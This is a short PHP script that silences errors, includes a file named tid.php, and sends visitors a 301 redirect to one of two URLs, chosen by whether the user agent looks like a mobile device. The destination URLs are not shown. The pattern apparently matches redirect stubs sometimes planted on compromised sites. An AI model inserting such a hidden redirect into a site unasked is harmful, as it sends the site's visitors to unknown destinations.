<?php
error_reporting(0);
include_once ('tid.php');
function isMobile() {
    return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]);
}
if(isMobile()){
	Header("HTTP/1.1 301 Moved Permanently");
    header("Location: $mobile");
}
else {
	Header("HTTP/1.1 301 Moved Permanently");
    header("Location: $pc");
}
?>